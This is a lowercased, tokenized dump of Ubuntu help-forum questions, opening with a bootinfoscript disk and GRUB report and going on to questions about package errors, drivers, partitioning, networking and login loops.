ext4 boot sector type : - boot sector info : operating system : ubuntu 12.10 boot files : /boot/grub/grub.cfg /etc/fstab sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.05 20130218 boot sector info : syslinux looks at sector 60192000 of /dev/sdb1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /syslinux/syslinux.cfg /efi/boot/grubx64.efi /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 58,509,311 58,507,264 83 linux /dev/sda2 58,511,358 62,531,583 4,020,226 5 extended /dev/sda5 58,511,360 62,531,583 4,020,224 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 32.7 gb , 32717537280 bytes 256 heads , 36 sectors/track , 6933 cylinders , total 63901440 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 32 63,901,439 63,901,408 c w95 fat32 ( lba ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/loop1 b0e9d453-bc59-48e7-9573-44ac4e2e59bb ext3 /dev/sda1 8930f81d-cec6-4a78-b913-7680675d087c ext4 /dev/sda5 cba9a4ff-1f1f-44b5-a66f-006fe7c50d59 swap /dev/sdb1 3a8b-2f12 vfat usb20fd ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /cdrom vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_gb insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } set linux_gfx_mode=keep export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-8930f81d-cec6-4a78-b913-7680675d087c ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi linux /boot/vmlinuz-3.5.0-22-generic root=uuid=8930f81d-cec6-4a78-b913-7680675d087c ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-22-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-8930f81d-cec6-4a78-b913-7680675d087c ' { menuentry 'ubuntu , with linux 3.5.0-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-22-generic-advanced-8930f81d-cec6-4a78-b913-7680675d087c ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi echo 'loading linux 3.5.0-22-generic ... ' linux /boot/vmlinuz-3.5.0-22-generic root=uuid=8930f81d-cec6-4a78-b913-7680675d087c ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-22-generic } menuentry 'ubuntu , with linux 3.5.0-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-22-generic-recovery-8930f81d-cec6-4a78-b913-7680675d087c ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi echo 'loading linux 3.5.0-22-generic ... ' linux /boot/vmlinuz-3.5.0-22-generic root=uuid=8930f81d-cec6-4a78-b913-7680675d087c ro single nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-22-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 8930f81d-cec6-4a78-b913-7680675d087c else search -- no-floppy -- fs-uuid -- set=root 8930f81d-cec6-4a78-b913-7680675d087c fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=8930f81d-cec6-4a78-b913-7680675d087c / ext4 noatime , discard , errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=cba9a4ff-1f1f-44b5-a66f-006fe7c50d59 none swap sw 0 0 192.168.1.76 : /mnt/fs01/tv_shows /home/rhys/tv_shows nfs rsize=8192 , wsize=8192 , timeo=14 , intr 192.168.1.76 : /mnt/fs01/movies /home/rhys/movies nfs rsize=8192 , wsize=8192 , timeo=14 , intr 192.168.1.76 : /mnt/fs01/flac_music /home/rhys/flac_music nfs rsize=8192 , wsize=8192 , timeo=14 , intr -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/grub.cfg 1 = boot/initrd.img-3.0.0-28-generic 1 = boot/initrd.img-3.5.0-22-generic 1 = boot/vmlinuz-3.5.0-22-generic 1 = initrd.img 1 = vmlinuz 1 ========================= sdb1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ================= sdb1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdb1 : version of com32 ( r ) files used by syslinux : =============== syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in /home/xbmc/downloads/bootinfoscript : line 1646 : [ : 2.73495e+09 : integer expression expected no volume groups found [ /code ]
345519	i ca n't install valgrind due dpkg-deb broken pipe , how to fix this ?	hanu @ hanu-hp-pavilion-sleekbook-14 : ~/raijin/build_debug $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : locales the following packages will be upgraded : locales 1 upgraded , 0 newly installed , 0 to remove and 1008 not upgraded . need to get 0 b/3,801 kb of archives . after this operation , 6,537 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! locales install these packages without verification [ y/n ] ? y preconfiguring packages ... ( reading database ... 204496 files and directories currently installed . ) preparing to replace locales 2.13+git20120306-9 ( using ... /locales_2.17-92_all.deb ) ... unpacking replacement locales ... dpkg : error processing /var/cache/apt/archives/locales_2.17-92_all.deb ( -- unpack ) : trying to overwrite '/usr/sbin/validlocale ' , which is also in package libc-bin 2.17-0ubuntu5 configured to not write apport reports dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/locales_2.17-92_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) hanu @ hanu-hp-pavilion-sleekbook-14 : ~/raijin/build_debug $ valgrind the program 'valgrind ' is currently not installed . you can install it by typing : sudo apt-get install valgrind
345520	fresh install of 13.04 on ssd : no network , no mouse , low graphic mode	i am having some trouble installing 13.04 on an amd fx4300 uefi pc with one samsung ssd 120gb and 1tb hd . after installing from usb stick 13.04 the ssd the pc boots in low graphics mode with no network and no mouse driver : the only thing that i can do is type ... if i install ubuntu on the hd , when i reboot the pc hangs with a purple screen . obviously the usb stick runs perfectly the `` funny '' thing is that this machine is a motherboard/cpu upgrade of an older machine with the same graphic card ( ati radeon hd 5450 ) and the same hd ( with ubuntu 12.04 installed ) and the first time that i boot the upgraded machine the system was running perfectly with ubuntu 12.04 . now i have an unusable pc ... any idea ? wrong kernel installed ? i think i 'll try to install some older version of ubuntu ( 12.10 ) since it seems to me this is an installation issue .
345521	difftar archive not supported	how do i open difftar files ? when i try to extract them i get the error 'archive type not supported '
345522	how do i resize my partition in ubuntu ?	i had windows 8 installed on my system , which i screwed up , and now i run ubuntu 12.04 . while installing , ubuntu used all the 461 gb of hdd space ( one partition ) . now i want to make a new partition of maybe 100 gb or so , in order to install windows 7 alongside ubuntu ( with a dual-boot ) . but i ca n't even get a partition done . i ca n't change the partition in gparted either - the option is disabled .
345523	difference between ls and dir	why does the output of ls appears in colour while the output result of dir command comes colorless ? what 's difference between the ls and dir ?
345524	regrading installation of ubuntu on windows 8	i have windows 8 64 bit computer , i was trying to install ubuntu 12.04.lts using wibu is showing wbuildr.mbr error . what to do ?
345529	how to add icons to the launcher on ubuntu touch ?	i would like to add an icon for terminal and a couple of icons for my own scripts to the launcher on my ubuntu touch . how can i do that ?
345530	how can i install ati catalyst video driver of ubuntu 12.04.3 ?	edit my computer is thinkpad e420 with intel hd3000 and ati 6630m . i have reinstalled my ubuntu12.04.3 yesterday . i had successfully installed ubuntu and ati catalyst video driver many times about half year ago following these links : how do i get amd/intel hybrid graphics drivers to work ? what is the correct way to install ati catalyst video drivers ( fglrx ) ? however , this time i have no luck with installing ati catalyst video driver . i have tried version 13.4 , 13.1 , 12.8 of ati catalyst video driver . it seemed that 13.4 does n't support 12.04 any more , following this link , the lowest ubuntu version supported by ati 13.4 is 12.10 and for the reset of the ati drivers , the kernel version and xorg version of ubuntu 12.04.3 is too high to be supported . so , should i stay on ubuntu 12.04.1 with ati 12.8 , or there is any way to install ati driver on ubuntu 12.04.3 ?
345535	configure a container for using it with juju	is there a way to use juju o lxc containers that have not been created by juju bootstrap ? the only configuration options for local containers are the root-dir and the admin-secret , which i understand some service within the container should be able to receive . looking at the original message where this feature was announced that 's probably zookeeper , but still i am not too sure how to do it . any help will be appreciated .
345536	package dependencies are broken ?	i 'm not able to install vlc media player , or even update my computer . i get this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . then i click more details and get the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8-0ubuntu0.13.04.1 ) but 2.0.8-0ubuntu0.13.04.1 is to be installed depends : libavcodec-extra-53 ( > = 6:0.8.6 ) but it is not going to be installed depends : libavutil-extra-51 ( > = 6:0.8.6 ) but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.17-0ubuntu5 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.11-0ubuntu1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.3-1ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.4+dfsg-0ubuntu9.3 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.4+dfsg-0ubuntu9.3 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.7.3-1ubuntu1 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.9 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.7.dfsg-13ubuntu2 is to be installed how can i fix this ? thanks . when i update the system using terminal , i get fetched 817 kb in 29s ( 27.7 kb/s ) n : ignoring file 'duinsoft.listsudo ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 w : gpg error : http : //us.archive.ubuntu.com raring release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //ppa.launchpad.net/screenlets/ ... amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/screenlets/ ... -i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . sources list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring universe deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //ppa.launchpad.net/noobslab/noobslab-conky/ubuntu precise main # deb-src http : //ppa.launchpad.net/noobslab/noobslab-conky/ubuntu precise main after following instruction w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/screenlets/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . cyberproxy @ paradox : ~ $ sudo apt-get install -f [ sudo ] password for cyberproxy : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : efibootmgr grub-efi-amd64-bin kde-l10n-engb use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . n : ignoring file 'duinsoft.listsudo ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension cyberproxy @ paradox : ~ $
345537	how to remove traces of previous ubuntu installation ?	i had to reinstall my ubuntu 13.04 due to a gui-crashing experiment with cairo-deck . actually i often tamper with gui , and from time to time it leads to the necessity of re-installation . i re-install the system on / but i leave /home intact to preserve my files . /home seems to contain some settings from previous installations . can anyone help me clear those settings ?
345543	convert multiple images to png with adam7 interlacing	is there any application in ubuntu which can convert multiple images to png with adam7 interlacing like in gimp
345547	not able to run upgrades	i am a new user trying to run upgrades in my new ubuntu 12.04 , but i am running in to a problem all scripts seems to do fine and it gets to this screen package configuration ┌─────────────────┤ configuring ttf-mscorefonts-installer ├─────────────────┐ │ │ │ truetype core fonts for the web eula │ │ end-user license agreement for microsoft software │ │ important-read carefully : this microsoft end-user license agreement │ ( `` eula '' ) is a legal agreement between you ( either an individual or a │ single entity ) and microsoft corporation for the microsoft software │ accompanying this eula , which includes computer software and may include │ associated media , printed materials , and `` on-line '' or electronic │ documentation ( `` software product '' or `` software '' ) . by exercising your │ rights to make and use copies of the software product , you agree to be │ bound by the terms of this eula . if you do not agree to the terms of │ this eula , you may not use the software product . │ │ ok │ │ └───────────────────────────────────────────────────────────────────────────┘ and hung there for ever the `` ok '' is not active . i have wait hours it still the same , if i try to closed say that there is a process running and it will kill it . it does the same with the dvd upgrade . thanks for youe help .
345550	`` sorry , installation of this driver failed . please have a look at the log files for details ''	i just installed ubuntu and love it so much , its so fast now . but i have a problem connecting to the internet . i checked and saw i have to install the driver broadcom sta wireless driver but every time i do try to install it it says : sorry , installation of this driver failed . please have a look at the log files for details : /var/log/jockey.log i went to terminal and copy and pasted the log file name . and when i did it said i have no permission to access this file . i checked on the forums that i have to be on a wired connection . so i plugged my laptop into my router and i got internet then tried to install the driver again . and it was loading then when it got to the end the same message popped up . also i have one of those little usb router things you plug into the computer and it gives you internet i have been using that but its to slow . so i want to use the one in my computer but cant . since , i am so new at this all ubuntu thing can u explain to me , how to fix this please ? p.s i forgot to mention i am using ubuntu 12.04 . thanks alot : )
345555	ubuntu 13.04 shutdown abruptly at midnight	i have recently installed ubuntu 13.04 on my computer . few days back i noticed that my operating system shuts down abruptly at 12 in midnight . i have searched for it everywhere but i could n't find any help . if there is anything i could do to solve this problem of mine , i am all ears . thanks .
345556	is distribution upgrade bad for server ?	the version of ubuntu offered in vps is usually old , and i need newer version of application . thus , i should upgrade the ubuntu version . however , apt-get dist-upgrade is not 100 % safe ( this is probably the reason that it is always recommended to take backup before this action ) . in desktop , any problem in upgrade or packages can be easily noticed , but in server , it can be hidden . not visible to the admin , but affecting the experience of end-users ( e.g. , website visitors ) . is it safe to upgrade the ubuntu distribution in a vps ?
345559	can i allocated more then 30gb to ubuntu wubi ?	says it all the title ! i would like to use linux/ubuntu because of its interface but i dont wont to lose windows all together !
345561	no desktop after upgrade from ubuntu 12.10 to ubuntu 13.4	after i upgraded to ubuntu 13.4 at first i could n't log in . i got the error `` could not update ice authority '' . afther deleteing the file `` ice authority '' i could n't see anything on the screen . also my `` user '' from the earlier install , is missing too , but i can see the files in the home/olduser directory . can any one help me out with this , i do n't want to format as i have a lot of files and contacts and other data saved in the applications .
345562	permanently remove item from ` $ path`	i 've dug around forums trying to find a way to get rid of some default items in my path , but to no avail . here is what it gives right now : /home/blaine/.rvm/gems/ruby-2.0.0-p247/bin : /home/blaine/.rvm/gems/ruby-2.0.0-p247 @ global/bin : /home/blaine/.rvm/rubies/ruby-2.0.0-p247/bin : /home/blaine/.rvm/bin : /home/blaine/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games and the offending items are the the two with games in them : : /usr/games : /usr/local/games neither of which i use , but that really is n't the core of my question . i want to get rid of these items ( and to know how to do similarly in the future ) , but i ca n't find where these defaults are being set . there 's no mention of path when i grep these files : /etc/profile /etc/profile.d/* ~/.bashrc ~/.bash_profile i 'm using ubuntu 13.04
345563	tts in multiple languages , to mp3	i 'm looking for a software that can read different languages in the same text . i would prefer a software for ubuntu , but i can accept to use wine . the document in question has a series of sentences in english + the spanish equivalent . my idea was to create a mp3 file of the recording of these sentences , so that i could listen it to practice my pronunciation . suggestions on how i can carry out this project are welcome !
345566	networking stop/waiting error	i wanted to set up a bridge connection for my vms ( i am using kvm ) . i modified my etc/network/interfaces file and its contents are : auto lo iface lo inet loopback auto br0 iface br0 inet dhcp bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off after modifying the etc/network/interfaces file i wanted to make them active so i run the following command : sudo /etc/init.d/networking restart but i got the following output : running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces so i tried restarting network by the following command : sudo service networking stop & & sudo service networking start i get the following output : stop : unknown instance : if i do : sudo service networking start i get : networking stop/waiting and my net has stopped working after that . i am using ubuntu 12.04 and have a wired dhcp connection . please try to resolve this issue so that i can successfully configure bridge for my vms and get back my net connection .
345568	how to fill an invisible/empty icon in unity launcher that appeared while trying to dock a launcher ?	a couple of days ago i was attempting to add an application to the unity launcher from the unity dash and instead of adding the app it created an `` empty icon '' ( blank space ) in the launcher there is no way to remove it right clicking produces nothing , hovering over the `` icon '' does not produce a tool tip , and clicking it does not open an application . the only thing i can do with it is move it around in the stack of apps in the launcher . anyone know how to fix this ?
345571	linux graphics utility intel	the linux graphics utility from intel say it does n't support 12.04 . since 13.04 is only supported for 9 months and 12.04 is lts , why would 12.04 be considered obsolete and not receive support ? or is there a way around this ? edit : even using the 64bit version of intels 1.0.1 utility , i am told my distro is n't supported . it is hard to call 12.04 lts if 3rd party hardware manufacturers call it obsolete .
345573	learning how to manage vps using ubuntu	i am newbie to ubuntu and give up shared hosting and want to use vps but do not know linux . many recommending using ubuntu server for the vps . i 've explored the website and found a lot of documentations . please advise for the help i should use for managing the vps . thanks
345574	measuring ambient noise	i am looking for a way to measure the amount of ambient noise in a given place , with my computers microphone . audacity seems to do it , but i cant get it to tell me the measurement ( it just moves a bar up and down ) . i also found http : //www.youtube.com/watch ? v=kgapjpoeeji . it ( more or less ) works , but i could not manage to convince it to use a different microphone . ideally , i would like to register and graph noise levels . but just a program that informs me of the noise levels would already be nice
345578	unable to reinstall ubuntu any version	wubi.exe will not run on my computer . i uninstalled ubuntu 12.04 and now i can not reinstall it . windows 7 pro .
345579	after recovering from suspend , artifacts appear in text	i have ubuntu desktop 12.04 64-bit installed on my panasonic cf-51 laptop ( gpu : intel 945gm ) . when i recover from suspend mode , artifacts appear in the text . these artifacts look random . this occurred even with a fresh install , fully updated , with no other programs installed .
345580	how can i exclude a ( already via fstab mounted ) single partition from automounting ?	since i moved my ( encrypted ecryptfs ) /home to new partition on another disk and modifying my fstab , xfce shows a shaded device icon on my desktop , which mounts the same partition ( as it is done with usb-mass-storage ) , but unencrypted . as i have read , xfce should n't offer it for partitions defined in /etc/fstab . can i exclude this partition from xfce-automount without disabling the entire automount-feature ? i am using xubuntu 13.04 .
345584	ubuntu 13.04 log-in loop	i 've seen other posts with this problem ( so i know it 's not unheard of ) , but i 've gone through most of the suggested fixes without much luck . i made sure .xauthority is owned by me and not root ( -rw -- -- -- - 1 jgodwin jgodwin 150 sep 14 15:24 .xauthority ) and i have not made any edits to my .profile . here is what my .xsessions-errors looks like : script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp ** message : applet now removed from the notification area compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite ** message : using fallback from indicator to gtkstatusicon compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session i/o warning : failed to load external entity `` /home/jgodwin/.compiz/session/10eca48925146e8b2e137917707984620100000024460031 '' compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - 